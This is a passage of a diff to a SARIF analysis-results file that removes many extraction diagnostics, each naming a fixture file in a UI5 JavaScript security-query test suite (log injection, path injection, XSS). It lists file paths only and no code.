"js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7698,18490 +7726,1124 @@ "text" : "" } } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 234 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - 